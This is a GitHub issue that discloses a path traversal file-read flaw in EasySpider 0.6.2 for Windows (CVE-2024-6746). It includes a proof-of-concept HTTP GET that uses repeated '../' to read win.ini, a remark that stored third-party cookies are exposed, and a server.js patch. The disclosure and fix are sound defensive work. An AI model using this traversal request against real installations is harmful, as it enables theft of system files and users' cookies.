search

Hebing123 / cve

0 stars 0 forks source link

EasySpider Version 0.6.2 Windows LFI #60

Open Hebing123 opened 4 months ago

Hebing123 commented 4 months ago

摘要

EasySpider Version 0.6.2 Windows 存在任意文件读取漏洞,攻击者可以读取EasySpider应用所在磁盘的任意文件而不受访问控制限制,该漏洞将导致严重的敏感信息泄露、系统崩溃等问题。

Summary

EasySpider Version 0.6.2 for Windows has an arbitrary file read vulnerability. An attacker can read any file on the disk where the EasySpider application is located without access control restrictions. This vulnerability may lead to sensitive information leakage, system crashes, and other issues.

细节

  1. 通过输入错误路径来得知EasySpider运行目录的绝对路径。 image
  2. 如果运行目录在C盘下(用户一般会放在桌面(C:/Users/%USER%/Desktop/路径下运行,刚好就在系统盘),将会影响系统的安全性。例如:通过POC读取C:/Windows/win.ini。 同时,攻击者不仅可以读取系统文件,还可以访问存储在 EasySpider\user_data 目录下的用户信息,包括第三方站点的 Cookie 等内容。 image

    Details

  3. By inputting an incorrect path, you can determine the absolute path of the EasySpider running directory.
  4. If the running directory is under the C drive (users usually run it from the desktop, e.g., C:/Users/%USER%/Desktop/), it will affect system security. For example, you can read C:/Windows/win.ini using a Proof of Concept (POC). Additionally, attackers can not only read system files but also access user information stored in the EasySpider\user_data directory, including cookies from third-party sites.

POC

GET /../../../../../../../../../Windows/win.ini HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: localhost:8074

补丁

修改 \EasySpider\resources\app\server.js 的代码,确保用户提供的路径不包含任何不安全的路径遍历序列。

const SAFE_BASE_DIR = path.resolve(__dirname, 'src');
···
      const safePath = path.join(SAFE_BASE_DIR, pathName);

      if (!safePath.startsWith(SAFE_BASE_DIR)) {
        res.writeHead(400, {"Content-Type": "text/plain"});
        res.end("无效的请求路径");
        return;
      }

Patch

Modify the code in \EasySpider\resources\app\server.js to ensure that the provided path does not contain any unsafe path traversal sequences.

const SAFE_BASE_DIR = path.resolve(__dirname, 'src');
···
      const safePath = path.join(SAFE_BASE_DIR, pathName);

      if (!safePath.startsWith(SAFE_BASE_DIR)) {
        res.writeHead(400, {"Content-Type": "text/plain"});
        res.end("Invalid request path");
        return;
      }
Hebing123 commented 4 months ago

CVE-2024-6746